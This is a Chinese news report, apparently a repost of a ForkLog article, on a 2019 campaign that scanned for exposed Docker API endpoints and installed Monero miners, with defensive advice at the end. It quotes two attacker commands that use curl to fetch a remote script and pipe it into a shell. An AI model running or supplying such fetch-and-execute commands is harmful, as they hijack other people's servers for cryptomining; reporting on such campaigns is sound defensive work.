在易受攻击的Docker容器中发现隐藏的加密货币矿机

在易受攻击的Docker容器中发现隐藏的加密货币矿机

一群黑客发起了一项大规模活动，以搜索具有开放API端点的Docker容器，以在其上随后安装Monero加密货币矿机（XMR）。该问题是由Bad Packets LLC的网络安全专家发现的。

检测到针对公开的Docker API端点的机会性大规模扫描活动。

这些扫描使用Alpine Linux映像创建一个容器，并通过以下方式执行有效负载：
“命令”：“ chroot / mnt / bin / sh -c’curl -sL4 https://t.co/q047bRPUyj | bash；“”，＃威胁信息pic.twitter.com/vxszV5SF1o

-Bad Packets Report（@bad_packets）2019年11月25日

Docker是具有容器化支持的应用程序部署系统。可以将具有所有环境的应用程序盘点在易于管理的容器中：转移到另一台服务器，扩展或更新。

目前，黑客已经扫描了超过59,000个IP网络。一旦发现有漏洞的主机，攻击者便使用API??端点启动Alpine Linux OS容器并加载Bash脚本：

chroot / mnt / bin / sh -c‘curl -sL4 http://ix.io/1XQa | ash

该脚本安装经典的XMRRig加密货币矿机。在两天内，黑客获得了14.82 XMR（在发布时约为815美元）。

Bad Packets LLC建议Docker用户检查他们是否在Internet上公开其API终结点，关闭端口以及关闭无法识别的运行容器。

回想一下，10月，蠕虫病毒从Docker Hub开放存储库中的Docker容器的图像中传播，用Monero的隐藏挖矿程序感染了2000台计算机。

在Telegram上订阅ForkLog新闻：ForkLog Feed-整个新闻Feed，ForkLog-最重要的新闻和民意调查。

—-

编译者/作者：不详

玩币族申明：玩币族作为开放的资讯翻译/分享平台，所提供的所有资讯仅代表作者个人观点，与玩币族平台立场无关，且不构成任何投资理财建议。文章版权归原作者所有。